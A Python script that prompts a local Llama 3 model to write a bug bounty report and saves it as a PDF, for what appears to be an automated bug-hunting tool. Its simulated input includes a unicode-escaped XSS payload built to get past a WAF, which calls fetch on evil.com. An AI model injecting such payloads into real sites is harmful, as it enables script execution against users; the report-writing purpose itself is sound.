from langchain_community.llms import Ollama
from langchain.prompts import PromptTemplate
from fpdf import FPDF
import datetime

print("[*] Waking up the Reporting Agent...")

# 1. Connect to the Brain
llm = Ollama(model="llama3")

# 2. Define the Report Prompt
report_template = """
You are a professional application security engineer writing a bug bounty report.
Based on the successful exploitation below, write a concise, formal vulnerability report.

Scenario: {scenario}
Successful Payload: {payload}

CRITICAL INSTRUCTIONS:
- Do NOT use Markdown formatting (no asterisks, no hash symbols).
- Output plain text only.
- Include the following headers exactly as written, followed by your analysis:
EXECUTIVE SUMMARY:
VULNERABILITY DETAILS:
REPRODUCTION STEPS:
REMEDIATION ADVICE:
"""

report_prompt = PromptTemplate(
    input_variables=["scenario", "payload"],
    template=report_template
)

# 3. Create the PDF Generation Function
def create_pdf(report_text, filename="Bug_Bounty_Report.pdf"):
    print("[*] Compiling PDF...")
    pdf = FPDF()
    pdf.add_page()
    pdf.set_margins(left=15, top=15, right=15)
    
    # Add a Title
    pdf.set_font("Helvetica", "B", 16)
    pdf.cell(0, 10, "Automated Vulnerability Report", new_x="LMARGIN", new_y="NEXT", align="C")
    
    # Add the Date
    pdf.set_font("Helvetica", "I", 10)
    current_date = datetime.datetime.now().strftime("%Y-%m-%d")
    pdf.cell(0, 10, f"Generated by AI Hunter on: {current_date}", new_x="LMARGIN", new_y="NEXT", align="C")
    pdf.ln(10)
    
    # Add the AI's Text
    pdf.set_font("Helvetica", "", 11)
    # fpdf2 handles multi-line text beautifully with multi_cell
    pdf.multi_cell(0, 6, report_text)
    
    # Save the file
    pdf.output(filename)
    print(f"[+] SUCCESS! Report saved to your current folder as {filename}")

# 4. Simulate a Successful Hunt
target_scenario = "I need to bypass a strict WAF filtering angle brackets to get XSS in a JSON body."
winning_payload = r"\u003cscript\u003efetch('http://evil.com')\u003c/script\u003e"

print("\n[*] Asking AI to write the report...")
formatted_prompt = report_prompt.format(scenario=target_scenario, payload=winning_payload)

# Get the report text from Llama 3
ai_report_content = llm.invoke(formatted_prompt).strip()

# Generate the PDF
create_pdf(ai_report_content)
